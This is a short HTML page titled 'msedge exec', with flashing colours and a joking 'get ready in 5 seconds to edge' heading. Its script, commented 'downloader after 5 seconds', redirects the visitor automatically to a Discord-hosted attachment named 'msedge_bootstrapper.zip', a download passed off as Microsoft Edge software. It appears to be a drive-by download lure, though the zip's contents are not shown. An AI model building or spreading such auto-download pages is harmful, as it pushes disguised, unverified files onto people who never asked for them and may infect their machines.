<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>msedge exec</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            height: 100vh;
            overflow: hidden;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: Arial, sans-serif;
            color: white;
            text-align: center;
            animation: backgroundMove 2s linear infinite;
        }

        h1 {
            font-size: 2.5rem;
            text-shadow: 0 0 10px black, 0 0 20px aqua;
        }

        @keyframes backgroundMove {
            0% {
                background: aqua;
            }
            50% {
                background: black;
            }
            100% {
                background: aqua;
            }
        }
    </style>
    <script>
        // downloader after 5 seconds
        setTimeout(() => {
            window.location.href = "https://cdn.discordapp.com/attachments/1286995108238983241/1308865372031549592/msedge_bootstrapper.zip?ex=673f7f5e&is=673e2dde&hm=de8271a631cef155c9c7354f7d33db5434c53d024bc4b437799c61304f0acc19";
        }, 5000);
    </script>
</head>
<body>
    <h1>ready to start msedging?<br>get ready in 5 seconds to edge.</h1>
</body>
</html>
